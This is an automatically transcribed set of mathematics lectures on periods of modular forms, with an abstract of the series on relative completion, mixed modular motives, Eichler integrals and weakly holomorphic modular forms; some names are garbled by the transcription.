modular behavior of f with respect to the inversion s. And if you cut, if you move the first coefficient, you break that invariance completely. So it's kind of strange that this l function defined in this manner, whether some starts at one and not zero still satisfies the functional equation. But actually, if you think about it, that truncating at zero is exactly this tangential base point. So if you work out this formula, and I regret that I don't have time to do it. If you look at this formula in length one, what it does is that you take the holomorphic integral and you subtract something, and that exactly has the effect of it exactly explains this trick of Hecker's to get the l function in all cases. So that's a very nice little lemma, it's a nice remark. And I regret that I don't have time to explain that. It's interesting only for the Eisenstein series, but it becomes absolutely crucial in higher length iterated integrals. You really have to regularize in a careful way. And the formula is more complicated. But when you do this Hecker business, it's always strange. You've got essentially the Mellon transform from zero to infinity, and you've always got this weird term of integrating from zero to one of the residue. So essentially you integrate from zero to infinity of f minus its constant Fourier coefficient. And then there's an extra term, which is an integral from zero to one of the constant term. And the meaning of that extra term, integral from zero to one, is an integral along the tangent vector of length one in the tangent space. And that's very satisfying because it gives a very clear geometric meaning to these classical formulae. Anyway, so I digress. This is very well understood. And then let me just spell out the co-cycle equations in case you haven't seen it before. The co-cycle equations for s and t amount to functional equations on pf, which are called the period polynomial relations. So that's this first equation here. It corresponds to this, and then a second equation corresponds to a three-time equation. So these are called the period polynomial relations. And an example to have time quickly. So an example if we take f is the Ramanujan cusp form of weight 12, then we can write this polynomial explicitly as a holomorphic period, which is real, omega plus 36 over 691. So I hope these coefficients are correct. And I didn't copy them down incorrectly. Plus, so it has an even part and it has an odd part. So the odd part is given by the other holomorphic period. So these polynomials are very famous, and they show up in all sorts of places. So they're the smallest non-trivial solutions to these sets of equations. Okay, so then a remark here. So here we're only looking at the holomorphic identicals. That means we're only integrating f. If we want to capture the quasi periods, as I mentioned in the last lecture, if we want to get the quasi periods, again this is something that's not at all been considered classically. Then to capture them, we need to consider the full co-cycle, Cs, not just its totally holomorphic part. Just C whole s. So here these identicals are given by holomorphic monoliforms. We're studying this at the moment. So I claim that in the length one case, you can do these same calculations. And that will involve integrating a weakly holomorphic monoliform with poles at the cosps. You have to be careful how to do that. But then you can capture the quasi periods of the motive of f. So there are some numbers that I call eta plus and i eta minus. This is co-cycle, we are not too high. This is icolichimera, yeah. This is very classical and it's been studied in great detail by Zagier and Mannin, studying in the 60s I think and there's a huge literature on this by now. So I should mention, yeah. So Mannin did a lot more, I regret I don't have time to talk about it. So Mannin proved something very beautiful, something called the universal coefficients theorem, that he showed that there's an action of the Hecker operators on these polynomials. And so once you have an action of the Hecker operators, you get the eigenvalues and you can regenerate your modular form. So the period polynomial completely determines the modular form uniquely. And I regret I don't have time to talk more about it, but he explained how to get the Hecker operators to act on these polynomials. It's a very beautiful theory and we don't really know how to generalize this in any reasonable way in higher lengths. So these give some extra relations over and above these co-cycle relations satisfied by these period polynomials. Okay, so now the second example is the case of an Eisenstein series and this is less classical. I mean, this is equivalent to stuff that's been known for a long time. And in particular, I'm sure that Romano-Jan knew the formula I'm going to write down. But what's new, what was known was this whole notion of tangential base point. So these formulae were sort of ad hoc. But now equipped with the notion of tangential base point, we get a completely canonical, we can define a canonical Eisenstein co-cycle. And that's by integrating all the way to the tangent vector of the cusp. So in the past you had to truncate somewhere or regularize it with some choice. But this is completely canonical. And the formulae equivalent to formulae in the literature. So what we get then is the coefficient of E2n plus 2 is an Abelian co-cycle, which is canonical. Now let me write it down. So first we define a rational co-cycle. So there's a lot of confusion on this in the literature. So I think it's good to spend a little bit of time on it. So first let me define a rational co-cycle that I call E0. And there's a slick way to write this down as a generating series, but I think it's more instructive just to give the formula. So there's a Bernoulli number B2n over 2n factorial. So this looks a bit strange, but there's a reason for it. Then you take x plus y, 2n minus 1 minus x to the 2n minus 1 over y. So this is a polynomial. The y factors out. And this is obtained as an easy integral around the cusp. I gave the formula earlier. It's an exercise to do that. And the value on s, the quick way to get this is through the L function of the Eisenstein series, which is a product of zeta, Riemann zeta functions. And if you take the value of a product of Riemann zeta functions, what you find is this expression with products of Bernoulli numbers. So again, I hope I didn't miscopy this formula, but it's in my paper somewhere. And so this expression with products of Bernoulli numbers comes up an awful lot in this theory and the theory of multiple zeta values. It's very interesting. So then the holomorphic Eisenstein co-cycle, then, of an Eisenstein series is 2 pi i times this rational co-cycle plus a co-boundary term 2n factorial over 2, and involves a Riemann zeta function times a co-boundary term. So this is a co-boundary. So I gave the formula earlier in the first lecture, I think. I'll give it again. So the co-boundary is on a vector. The delta naught of V on gamma is V minus V slash gamma. So for when this is evaluated on T, the element T, this doesn't appear at all. You just get the value of E naught on T. On, on, on, on evaluated on S, you get this formula of value on S plus some zeta value times y to the 2n minus x to the 2n. And it's very interesting because it means as a co-homology class, the zeta part drops out completely, so this transcendental part disappears, and you just get a rational, so the co-homology class associated with Eisenstein series is rational, and that's in, according to the Mann-In-Drinfeld theorem. But as a co-cycle, it's not rational, it's got some transcendental, actually transcendental coefficient. And that's going to be extremely important later on. Okay, so that's the length, this is everything in length one, and it's completely classical. So that was the length one story, and we've completely described it pretty much, and it's, it corresponds to the unionization of relative completion, and it's classical. So things start to get interesting in length two, and here we don't know so much. I'll just say briefly what some things I do know. The first interesting case is to look at two Eisenstein series. So the advantage of Eisenstein series is that they are totally holomorphic by nature. There's no non-holomorphic, weekly holomorphic counterpart. So we see everything, we can compute everything with these iterated, regularized iterated icline integrals. So we want the coefficient of a word in two Eisenstein series in this power series, and this defines some gamma co-chain in V2M tensor V2N. So this thing you can in turn break up into SL2 representations, it'll have many copies. So this is quite a rich object, it's got many different bits to it. And the very compact way to write the co-cycle equations on this thing are, if you like, relations between the coefficients, coefficients of this, this co-chain can be encoded, I claim, by the following co-cycle equation. So this is a gamma co-chain, it's in C1 V2M tensor V2N. And the most slick way of writing down these equations is in terms of a two co-cycle, C whole E2M E2N plus 2 equals the co-cycle E2M plus 2 whole, the whole is redundant here, C whole E2M plus 2. So this is a cup product. So the nice thing about this formula, it's a sort of recursive expression that gives you a formula for all of these coefficients in terms of the co-cycles of Eisenstein series which you've completely written down explicitly. And we see straight away we're going to get some odd zeta values, two odd zeta values, and the product of two odd zeta values for starters. And then this is going to, that's going to completely determine this up to an actual co-cycle, which will satisfy the classical co-cycle equations. And those numbers, those coefficients, they're going to appear, for example, in weight 12, you'll get the exact, these polynomials, but time some new coefficients. And they can be computed to very high orders. And the question is what are they? So let me just summarize what the techniques are. So a regular isotradian is a group of two Eisenstein series, it's a very interesting object. What do we get? Well, we get multiple zeta values, get some non-trivial multiple zeta values occurring. And that's essentially in the same way here. We get a sort of co-boundary term and the coefficient is an MZV. And the depth here can be up to four. Then the main technique for computing this is using the Rankin-Selberg method. So it's slightly involved, so I won't say anything about that. But using the Rankin-Selberg method, which a priori relates to something different, but you can use it to do this, to do part of this calculation, what it produces for you is some coefficients proportional to the L function of every cusp form at non-critical values. So for all values k bigger than or equal to the weight of f. So these are non-critical values of all cusp forms. So again, it's perhaps slightly surprising because the Eisenstein series, so out of Eisenstein series, you're getting cusp forms. And when we see the hot structure, it'll be even more surprising because the series are somehow tate. But there are good reasons why it produces periods of motives of modular forms. So then plus we get something else, which is kind of curious. We get a different, another period, which I didn't see in the literature, but it's a period of an extension of the motive of a cusp form, sorry, of the trivial motive if you like by a motive of a cusp form. So this is a simple extension, so in a category of hot structures or something, by a pure modular motive. And this L function is essentially the regulator. So when you have an extension, there's a theory of regulators, gives you an invariant, and an invariant of the extension class as the regulator, and Baylinson's conjecture predicts that it should be a special value of the L function. But there's another period. Such an extension has another period, which is not canonically defined, it's defined up to some rational multiple. And I don't know what to call it, maybe at some point I call it CFK, but we get this number as well showing up as a double Eisenstein integral. So that's basically it. We get multiple zeta values, essentially of two different types occurring in two places and only two places. You get single zeta values, products of single zeta values, two pi i's, L values of non-critical L values, and some sort of companion period that goes with this. And before stopping, I'll just mention some other sort of slightly surprising consequence of the co-cycle equations. It's something that I call transference. And then I'll stop. Which is that the co-cycle, you don't see this, well, okay, I might have said that the co-cycle relations in length n plus one imply relations in length n. So what I mean by that is imagine we knew what the co-cycle were for length one here, and then we want to solve for this in terms of those. And the question is, is that obstructed or not? So having solved a length, having done an ansatz at length n, can you then find a solution at length n plus one? The answer is yes for co-cycles in general, but the answer is no if you fix the value of your co-cycle on t, which we know to all orders. So if you ask the problem, can we, having determined a length n, can we determine the length n plus one such that the value of the co-cycle on t is what it should be? Then you find it is obstructed, and that obstruction is precisely the pizza n in a product. And it gives something very interesting indeed. And then you find that the liftability of these equations to the next length actually provides a constraint at the previous order. And for length one iterated integrals, it gives a well-known fact that so-called the Conan-Zagya extra, so-called extra relation satisfied by these period polynomials, which is the period polynomial pf here of a cusp form is orthogonal to the period polynomial of an Eisenstein series. It's an extra relation. And in length two we get something even more interesting. We find that the iterated integral of two Eisenstein series can be related to, or a piece of it can be related to a piece of the iterated integral of an Eisenstein series and a cusp form. And this in turn, a piece of this can be related to a period of an iterated integral of two cusp forms. So I call this transference because coefficients from apparently very different parts of this, these iterated integrals, are getting transferred from one piece and apparently very different piece. And as a final comment, so I expect that this could generalize, I don't know how to do it, that I expect that we find the special values of all rank and sell bug L functions, non-critical L values. I expect, so for small values of K, you can use the classical rank and sell bug method, but I expect them to occur for all values of K as triple iterated integrals. And unfortunately, I don't know what's missing here is that there isn't a good analytic technique for computing and there should be some higher rank and sell bug method that enables you to prove that some higher iterated integrals give spit out these numbers. And that's very important because Baylinson's conjecture is not known in this case. I will stop there. Thank you.
|
In the `Esquisse d'un programme', Grothendieck proposed studying the action of the absolute Galois group upon the system of profinite fundamental groups of moduli spaces of curves of genus g with n marked points. Around 1990, Ihara, Drinfeld and Deligne independently initiated the study of the unipotent completion of the fundamental group of the projective line with 3 points. It is now known to be motivic by Deligne-Goncharov and generates the category of mixed Tate motives over the integers. It is closely related to many classical objects such as polylogarithms and multiple zeta values, and has a wide range of applications from number theory to physics. In the first, geometric, half of this lecture series I will explain how to extend this theory to genus one (which generates the theory in all higher genera). The unipotent fundamental groupoid must be replaced with a notion of relative completion, studied by Hain, which defines an extremely rich system of mixed Hodge structures built out of modular forms. It is closely related to Manin's iterated Eichler integrals, the universal mixed elliptic motives of Hain and Matsumoto, and the elliptic polylogarithms of Beilinson and Levin. The question that I wish to confront is whether relative completion stands a chance of generating all mixed modular motives or not. This is equivalent to studying the action of a `motivic' Galois group upon it, and the question of geometrically constructing all generalised Rankin-Selberg extensions. In the second, elementary, half of these lectures, which will be mostly independent from the first, I will explain how the relative completion has a realisation in a new class of non-holomorphic modular forms which correspond in a certain sense to mixed motives. These functions are elementary power series in $q$ and $\overline{q}$ and $\log |q|$ whose coefficients are periods. They are closely related to the theory of modular graph functions in string theory and also intersect with the theory of mock modular forms.
|
10.5446/51001 (DOI)
|
What the End Okay, so today we have to finish it at one o'clock on the dot. So what I propose to do is to start immediately and just keep talking through for an hour and a half without a break. That's okay. So I'll begin with some geometric background. So the main space we're going to work on is M11, the modular stack of elliptic curve. So there'll be two different main ways of thinking about this. First is over the complex numbers and so over C we will think of M11 or sometimes M11 and simply as the orbit fold quotient of the upper half plane by gamma. So H, I'll be consistent and call this Tor. So H is the upper half plane and gamma throughout this lecture will be SL2Z and nothing else. Okay, so we have the orbit fold quotient and this is very easy to work with roughly speaking geometric objects on M11 and such as local systems or vector bundles and so on can be viewed as objects upstairs on H which are gamma equivalent. So we'll see examples of these. Then we have the universal elliptic curve. So really it's the analytic universal elliptic curve and it is described again as a quotient as an orbit fold C cross H over gamma, that's correct, semi-direct Z2. So gamma is going to act on the right on Z2 and let me give the actions on C cross H. So if gamma is ABCD matrix in SL2Z then gamma of Z Tor is Z over C Tor plus D and then gamma acts on Tor in the usual way A Tor plus B over C Tor plus D and then for Mn in Z2 we have Mn Z Tor equals Z plus M Tor plus N and Tor stays put. Okay so that defines the universal elliptic curve over C and concretely a point in M1 N is an isomorphism class of elliptic curves E and the fiber over that point is the elliptic curve itself. So that's one way to think about M11, it was very classical and the second way will be much more algebraic and I'll only need to work over Q but we can do better, we can work over the field, sorry the ring K of the integers with 12 inverted and to do this it's convenient to work with a slightly different space which I learned about from DeCaine. So M1 vector 1 is rather nice, it's the moduli not stacked but it's a scheme of elliptic curves E with the data, so over C at least, with the data of a non-zero tangent vector V in the tangent space of the elliptic curve at the identity, so over C it's, a picture like this you have some non-zero tangent vector sticking out of the tangent space at the identity. Now a more algebraic way to think about this, an elliptic curve with the data of such a tangent vector is equivalent to the data of the elliptic curve with an abelian differential, so omega is in H0, is a section of its chief of holomorphic differentials and such that its pairing with V is 1 for example. So another way to say that is that the V defines, the tangent bundle is trivial and so the data of a non-zero tangent vector here duly gives a non-zero holomorphic differential all over the whole curve. Okay so this has now a very algebraic description, such a curve E we could represent it by an equation y squared equals 4x cubed minus ux minus V and the abelian differential we write as dx over y. And so the point is that if you scale this in the usual manner then this, that will define a nice morphic elliptic curve but this differential will also get scaled. And more importantly that when y goes to minus y, so this involution then you don't detect it here but you do detect it on this differential omega because it will change sign and that's the reason that this is a scheme and not a stack. So very explicitly we can write this as m1 vector 1 is simply the affine, so this elliptic, this is smooth so this equation has to have vanishing discriminant. So the space of such, these equations are parameterized by a2 with coordinates u and v minus the locus where the discriminant vanishes. So d here and from now on will be u cubed minus 27v squared which is actually 1 sixteenth of the discriminant of this equation. We don't care about the 16, especially since we're inverting 2. So m1, 1 is very explicitly this complement in two dimensional affine space and it's just spec of k uv 1 over delta. So here a is coordinates uv. Okay so this defines a very explicit scheme and it's affine ring which is this thing here m1, 1 vector 1 has a gm action amidst a grading, so I think of this as a gm action, actually a multiplicative group and it's the usual one, it's the one that gives u weight 4 and v weight 6. So uv by the action of a point lambda in gm of q for example becomes lambda to the minus 4u and at the minus 6v. And then with this description, so this is a very nice scheme, we can think of m1, 1 as the stat quotient m1 vector 1 by the action of gm. So that means that objects on m1, 1 will be viewed as gm equivalent objects on this very concrete scheme. And in this language the Dean-Manford compactification which we won't need today is just gm quotient of a2 minus the origin. Okay and in this language the universal elliptic curve is very explicit, I'll just write it up here. So the universal elliptic curve over m1 vector 1, so it comes with this tangent vector or this non-imbedient differential, it's just explicitly the spectrum of o m1, 1 which is just this ring over here, adjoined x, y modulo the equation y squared equals 4x cubed minus ux minus v. Well the ideal generated by that equation. So this is all very concrete. So now I want to describe some local system, first a local system on m1, 1 and then secondly an algebraic vector bundle with integrable connection on m1, 1. So this is all very classical. So we're going to give ourselves a family of canonical local systems on m1, 1 and out of these I'll define the better version of relative completion that will be built out of these. So these are if you like sort of the basic simple building blocks out of which we're going to construct iterated extensions which are going to be very complex. So this is what you think it is, h is going to be r1 pi lower star q, so I forgot to say what pi was. Pi is this map and q is the constant sheaf on the elliptic curve and therefore this describes a rank 2 local system of q vector spaces and it can be described very concretely that the fiber over e is simply the co-homology group h1 of e with coefficients in q which is a two dimensional q vector space. And now defining the usual manner vnbb for betty because this is really betty co-homology working with. So this will be the nth symmetric power of h and therefore it is a rank n plus 1 local system on m11n. So we think of that, well we can think of that very concretely by the principle described earlier, a local system on m11n is the same thing as a q vector space of the same dimension plus the data of an action of gamma. Now let me briefly describe the dual local system to this. So this local system has a dual and its fibers are h or homology so this can be described very explicitly. So if our elliptic curve, this is what we're working over c here of course, is c modulo the lattice tau z plus z then we have the usual picture for a fundamental domain for this action with zero here, tau is on the upper half plane so it's up here, 1 we call this a and we call this b then a and b generate this homology group so a and b are a basis of this. And now to fit with the modular forms community notation, I'm going to switch notation and I'm going to write x equals minus b and y equals minus a and I'm not 100% sure about the signs here, it could be plus, you can take it plus if you like but it makes no difference whatsoever because there are no modular forms of odd weight in this context so it's impossible to say. And then so this local system then can simply be viewed as the vector space qx, direct sum qy, so this is the absolutely standard notation in this business where v has a right action of gamma where if we have gamma equals abcd xy maps to x plus by cx plus dy and this notation this is denoted by a slash so v action of gamma is denoted by slash on the right. So this is unfortunate because some people work with a left action, the modular forms community works with a right action, at some point you can't have your cake and eat it and so I'm going to use right actions from now on but at some point this is going to come back and cause some trouble, you can't get away with having left actions everywhere in this business and there comes a point where you have to make a decision. This is absolutely standard in the modular forms community, people who do period polynomials and so on so I adopted this. The problem with right actions is that we write in English from left to right and there comes a point where it just becomes unworkable but this is very good for now so later on I will probably have to switch to a left action I'm afraid. So I leave you to struggle with these irritating difficulties. But then so modular this question of switching between left and right actions that I don't want to get into, we can think of this vector bundle as simply this symmetric power of this vector space is simply the space of polynomials or homogeneous polynomials in two variables of degree n plus right action of gamma and so this is the convention that I'm going to adopt. So those are local systems and now we want some algebraic vector bundles. So now we define, so these are going to be the building blocks for the Dirac relative completion which is going to be built out of iterated extensions of these building blocks in the same way that Betty relative completion will be built out of these building blocks. So in a consistent way I'm going to call V Dirac H, you can put a 1 here if you like is going to be H1 of the universal optic curve relative to M1 vector 1, just scheme plus the Gauss-Mannin connection as defined by Katzen-Oder. So this can be written down very explicitly as follows. So now we're working on M1 vector 1 and this very explicit scheme with the defining equation over there. So what it is, it's actually a trivial, the underlying vector bundle is trivial, so it's a trivial rank to coherent sheaf which is just the affine ring M1 vector 1 and then some generator S and another generator T. So using blackboard letters because later on S and T you're going to denote the standard elements in SL2-Z and I'm going to call S and T, so this is just to avoid confusion with elements in the group. And so what it's going to be GM at co-venture, there's going to be a GM action if you prefer S and T have some weight, so lambda of S is lambda times S and lambda acting on T is lambda inverse of T and what S and T corresponds to, so S corresponds to, so T corresponds to the holomorphic differential dx over y and S corresponds to x dx over y in this notation here. So we have, you can show this, this defines a trivial bundle, these two forms are always linearly independent and to compute the gas mining connection you differentiate. So these two one forms are closed on each fiber on each elliptic curve but on the family they're not closed so you differentiate them to get two forms and you rewrite the two forms as one forms on the base times something that you re-express in terms of this basis of one forms S and T and you can always do that and when you do it you get a certain formula which is very elementary but a bit of a chore to compute and it can be written, so the connection on this is given by D plus S T times a certain matrix of one forms psi omega minus u over 12 omega minus psi D by D S D by DT and I should explain what these forms are. I thought it's nice to give this complete, it's completely explicit so it's nice to write it down and I think the first person to write this down was cats in an appendix to a paper in a volume in some Antwerp proceedings in the early 70s I think. So these forms are very explicit psi equals D delta the discriminant with one over 12 omega equals 3 over 2 2 du dv minus 3 du over delta and I mind you that delta is this thing over there. So this connection is GM equivariant you can check that and therefore it defines a algebraic vector bundle plus integral connection on M downstairs, sorry on M11, not M1 vector one, so a priori this is defined on M1 vector one on the scheme and we view an algebraic vector bundle with integral connection on the stat quotient as being a GM equivariant such object upstairs on M1 vector one and I've got to say that actually this has regular singularities at infinity it's very easy to compute the residue at the point Q equals zero and check it's nilpotent and so on and so forth. So then finally we define Vn diram is the nth symmetric power plus its connection which is given by exactly that formula. Right and what I wanted to say that one of these forms I think omega essentially this thing looks a bit complicated but it really corresponds to dQ over Q morally. So there's a map, an analytic map from the upper half plane to this and if you work it out so you should think of you as Eisenstein series and V is Eisenstein series of weights four and six respectively and if you compute this you get exactly dQ over Q coming out. So this looks complicated but it's something very familiar. And then there's the Riemann-Helbert correspondence gives an isomorphism between this petty local system and this algebraic vector bundle. So VnB tensor O, what am I working? M11n is isomorphic to Vn diram tensor O. But this means that you're already working upstairs in some sense. And briefly so to the element t here because it t corresponds to dx over y, if you integrate dx over y along a and b you get one and tau and you can check that this corresponds to up to some possible power of 2pi i it corresponds to x minus tau y with possibly some sign and some 2pi i here. Okay so this is very classical. Before proceeding further these are the basic building blocks that we're going to use. Sorry? Is this isomorphism where s goes? No I don't want to compute s. I don't want to compute s. I think it involves it's more complicated. I don't want to say what s is. So cohomology. So by an extension of Gottendieck's theorem from 1964 on the algebraic diram cohomology in which you define algebraic diram cohomology. So this is you have to extend this because we're working with vector bundles, that's no problem, and also working over stack. So you have to say some words but it's really no big deal. This is just Gottendieck's theorem. He shows that there is a canonical isomorphism which is called a comparison isomorphism from the algebraic diram cohomology of M11 with coefficients in this algebraic vector bundle tensed with c and that's isomorphic to what should I call it? Well I think of this as Betty cohomology so you can put a b here if you like. It's just singular cohomology M11 analytic with coefficients in Betty vector bundle tensed with c. And when you do this isomorphism this is essentially given by integration and it produces numbers, it produces periods. So I'm now going to explain in more detail what these things are and say some words about these periods because it's astonishing but a lot of this didn't seem to be anywhere in the literature until very, very recently. So let's first describe this space. So because of the Oberfald description of M11 analytic it was just simply connected space quotiented by SL2Z then this right hand side is simply computable in terms of the group cohomology of its fundamental group so it's h1 gamma in this vector space Vn. Vn was this vector space up here of dimension n plus 1. So this is just group cohomology and I gave the definition last time explicitly in terms of cos cycles and modular boundaries. And then the question is then what is this, what is h1 diram, what is this left hand side? And so this should have some description in terms of modular forms. So now let me describe the diram cohomology. So let's write M, so M this is not a non-caligraphic M to distinguish from a moduli space this is just a Roman M, M factorial M plus 2 is defined to be the space of what are known as weakly holomorphic modular forms of weight M plus 2 with rational Fourier coefficients. So this is a vector space over Q rational Fourier coefficients. It's an infinite dimensional vector space over Q. So what is it? It's the set of functions f from the upper half plane to C which are holomorphic on h such that they are modular so f of a tau plus b over c tau plus d equal c tau plus d to the n plus 2 f tau. So they're modular of weight n plus 2. And furthermore that on the Q disk, oops I forgot to say, so here Q equals of course e to the 2 pi i tau. So because the translation invariant they have a free expansion and the point is that they need to have a lower expansion at the disk. So we suppose that they have a lower expansion of this form. But the point here is weakly means that you're allowed to have poles at Q equals 0. And the other condition is that the Fourier coefficients are all rational numbers. So this is a vector space. And yeah, so what I wanted to say though, so weakly here means that you're allowed a pole at Q equals 0 but nowhere else. So you only pull you're allowed. So the pole is at the cusp but you're holomorphic everywhere else on h. So now let's we have so the usual space, more familiar space of holomorphic modular forms is contained in the weakly holomorphic modular forms. And inside the holomorphic modular forms you have cusp forms. So these are the subspace of functions which are holomorphic at the cusp. So in this definition it means that n equals 0. So there's no pole at Q equals 0. And this is a cusp form. It's holomorphic at the cusp and the first Fourier coefficient a naught constant term vanishes. So now on this space of weakly holomorphic modular forms there's an operator Qd by dQ which is often called the pole operator. And so you can certainly take such a long expansion and differentiate it term by term but that in general will not be a modular form. It will destroy this property so it does not respect or preserve modularity. But what Bolshowed was I think in the 1950s Bolshowed that if you take apply this operator many times if you take the n plus 1th power of this operator then it in fact does preserve modularity if you restrict to the space of the correct modular weight. So if you look at modular forms of weight minus n then the n plus 1th power by some coincident or some accident, some miracle gives you modular forms of weight n plus 2. So that's a constant of Bolsh's theorem. So but this sort of does. And what I've got to mention here is that of course there are no holomorphic modular forms of negative weights but there are many weakly holomorphic modular forms of negative weights. In fact there's an infinite dimensional vector space. Okay so the theorem then is that you can describe this common explicitly in terms of these weakly holomorphic modular forms. What are the properties? Well I'm not sure I have anything particularly interesting to say. I mean yeah I mean clearly the properties that follow from the fact that it's this explicit differential operator. I mean the only thing I can add to this is it lands in the space of cusp forms. So there's a notion s factorial which is the subspace where a zero vanishes. That's a useful property that I won't need but that's the only thing that I can add really. I mean there's another way you can factorize this. The best way to see this is to factorize this in terms of holomorphic and anti-holomorphic differential operators each of which does preserve modularity and it's a better way to think about it. Okay so theorem is that there exists a canonical isomorphism in weakly holomorphic modular forms modulo the image of the ball operator. So you want to think of sort of n plus one fold derivatives of forms of weight minus n as trivial in some sense is isomorphic to the algebraic Diramco homology. And the map is 2f you assign f omega t which is a section of this. So that's wrong it must be f t to the n. Let me just take a moment. f omega t to the n. So that's a section of v n Diram and you have to check that it's closed under the it's annihilated by Nabla and that this in fact is zero on this and defines a nice morphosome homology. So a remark is that this space m factorial has a very natural description. You can think of it as the piece of weight n plus two in q tensor om one vector one which is nothing other than this the piece of graded weight n plus two in the ring q u v one of a delta. So here u has weight four and v has weight six and delta has weight 12 and so every weekly homomorphic model of form is a polynomial in Eisenstein series g4 and g6 divided by some power of the Ramanujan cast form. That's what it's saying. So this theorem so I'm a bit embarrassed to say but that it was clear from reading the modern literature and one of the forms of this theorem was not known and so I suggested to my collaborator Richard Hain that we we write it up and then later on it was pointed out to us that it kind of was known. So the history is sort of complicated. It was proved most recently by Scholl and I think the first proof explicitly in the literature is Kazuliski in 2016 somewhat surprisingly. A lot of this is implicit already in Scholl's work in the 90s but also there's a similar statement in the Piatic setting but we have to move the singular locals. It's a slightly different statement. Due to Coleman in 96 I think then this was redone very recently by Candelore in 2014 and the study of this left hand space is where I learned about it was in a paper by Gozoi in 2008. So Gozo showed in fact that you can, that this space here, that this quotient splits in some sense, that you can always represent elements here in this quotient as simply weakly holomorphic modular forms whose pole in Q is bounded above by the space of cusp forms. So this has quite an explicit description. I'll come to that in a minute. So these proofs are essentially the same and they use the fact that you work on a scheme so you work on a higher level modular curve and then you deduce this from that. But my proof with Richard Hain is just a direct proof on the stack straight off. So myself and Hain did this in 2017 and I tried to give a fair account of the history which is somewhat complicated. So this space here has a Hodge filtration. So the Hodge filtration, so this would be a Roman M, so this is a holomorphic modular form. Under this isomorphism, the subspace of holomorphic modular forms corresponds exactly to fn plus 1. So here we have a Dirham thing and a Betty thing that are compared via some canonical compression isomorphism. In fact, you can go much further and show that either the left-hand side or the right-hand side is the Dirham realisation of an actual motive of a pure motive and this was done by Scholl in the mid-80s. And much later there's another construction of this due to Konsani and Farber on the modular space of elliptic curves. Okay so this actually comes from a motive and let me describe it quickly depending on how much time. So let me describe it. So as probably we all know, let me just write the Dirham realisation, decomposes into cusp forms, an Isenstein part and a cuspiddle part and this decomposition is actually motivic, it's actually true on the level of the motives. That splits and then let me tell you what each piece looks like. So what are the Hodge numbers? So the Hodge types of the cuspiddle stuff, what it's of type n plus 1, 0 and 0, n plus 1 and the Isenstein part is of type has Hodenamers n plus 1, n plus 1. So in fact as a motive it's just a queue, it's going to be one-dimensional or at most one-dimensional and it's going to be, as a Hodge structure, it's going to be q of minus n minus 1. I'm not going to say much about Hodge structures today but I will next time. So then, so what is this? This is generated, so this Isenstein part is generated by Isenstein series. So g n plus 2 of weight n plus 2 for all n big and equal to 2, it vanishes otherwise. And so I mind you that g, the Isenstein series gk is a modular form of weight k whose constant free coefficient is a Bernoulli number plus the sum sigma k minus 1 m qg dm. So this is the normalization that we are going to take for Isenstein series and of course it has rational free coefficients, in fact integral free coefficients from here onwards as indeed you expect. So now, so that's the description of the Isenstein part, it's very concrete. On the cuspital part, it's a little bit more tricky but if we extend scalars, so if we tensor this, this is a motive of a queue, this is, Duram is a queue vector space, but if we tensor with q bar, you can get away with a lot less, but let's tensor over q bar for simplicity, then this thing admits an action, well it admits an action of HECA operators anyway, but over q bar it will decompose into eigenspaces. So over q bar it decomposes as a motive into, as a direct sum of pure motives v, I realize I'm overusing the letter v, but let me, well let me not make a dangerous change at this stage. So v lambda will be, so this will be the sum of cuspital HECA eigenspaces and each v lambda is a rank two, so it's a two dimensional q bar, it's a normalization, it's a two dimensional q bar vector space and with these hodge numbers, it's actually a motive over q, a pure motive over q bar. Okay good, so now let's just do an example in weight 12 to get a feel for it. So in weight 12 is the first interesting case, so n equals 10, then this space of weekly holomorphic modular forms here, modulo this quotient can be represented by the following three modular forms, we have G12, the Eisenstein series, which is a holomorphic modular form in M12, then we have the Ramanujan cusp form delta, which is q minus 24 q squared plus 252 q cube dot dot dot, which is a cusp form, weight 12, and then something else, because the motive of the cusp form is rank two, so there should be another Dirac class, it's given by something called delta prime, and as goes on I show that you can represent classes in this quotient uniquely if you decide that if you impose the condition that the pole is at most, that it has poles of order at most the dimension of the space of cusp forms, so here the space of cusp forms is one dimensional, so if we can force it to, we can choose a representative that begins q to the minus one plus something, and here's what it looks like, dot dot dot dot, and this is in M12 factorial, so this you can write down explicitly as some weight 24 modular form divided by delta, and in fact it determines it uniquely, and so the Dirac realisation of the motive associated to delta is the two dimensional vector space spanned by delta and delta prime, so we've got a holomorphic modular form and a weak holomorphic modular form. Yeah they do, so that's the point, so this is what I learned from Gozoy's paper, so the Hecker operators preserve this subspace, so that's a property of the ball operator, the Hecker operators preserve this subspace and therefore the Hecker operators act on this quotient, but that's a subtle thing because if you take a weekly holomorphic modular form like delta prime, what the Hecker operators do is they increase the order of the pole, so if you apply the Hecker operator to delta prime you get something and then you have to subtract off something in this guy, some differential, and then you'll get back a multiple of delta prime and it'll have the same Hecker eigenvalues as delta, so that's a subtlety, so delta satisfies a Hecker eigenvalue equation, it's a genuine eigenfunction but delta prime is an eigenfunction with an inhomogeneous term, you get something like a Tp of delta prime equals lambda p delta prime plus ball operator whatever it is 11 of psi p and p is going to depend on the prime, so that's what it means to be a Hecker eigenfunction in this setting. Yes, it's very interesting and I don't know, people have really studied very much the, well there are some papers studying the arithmetic properties of these coefficients but they're not completely mainstream, but I think they're extremely interesting and clearly absolutely central to this story, they don't, they rightfully deserve a central place in the theory. Okay, so now periods, which is my motivation with Hain for proving this theorem because we wanted to know that this was the correct Q structure in which to define periods of the motives of a model of Hain, indeed, it was known, so the corollary of Grottendeek's result over on that board is that this quotient here is canonically isomorphic to, by the comparison isomorphism to H1 gamma Vn tends to C and the map, if you work it all out, is F goes to the co-cycle which to an element of SL2z assigns the integral from gamma inverse tau 0 to tau 0, 2 pi i to the n plus 1 F of tau times X minus tau Y to the n d tau. And this too for any, this holds, if you pick any point on the upper half plane, do you integrate along the geodesic from the gamma inverse action on tau 0, there's a unique geodesic given by gamma between gamma inverse T0 and T0 and this gives you some polynomial in X and Y, this defines a co-cycle and if you modify your choice of tau 0 then that modifies that by co-boundary and so the co-homology class of this is well defined and it's the canonical comparison isomorphism. So there's a, I could talk for a long time about this but let me just make a couple of brief words, this is not the Eichler-Schemurrer isomorphism is a weaker statement than this. So what the Eichler-Schemurrer isomorphism theorem says, so this is stronger than the classical Eichler-Schemurrer theorem which states, well which we often write in the following way, it's the same thing, it's the same map but applied only to holomorphic modular forms and to complex conjugates of cuss forms and it is true that this gives an isomorphism, so I'm being a little bit sloppy, you have to take positive invariant and anti-invariant parts but let me just sort of give the punch line. The point is that if you do this, the Eichler-Schemurrer isomorphism then it only produces, this will only produce for you two periods for each motive of a modular form, for each v lambda but the theorem here actually gives, the theorem actually generates, so this Corolli actually generates all the periods, all four periods, so the 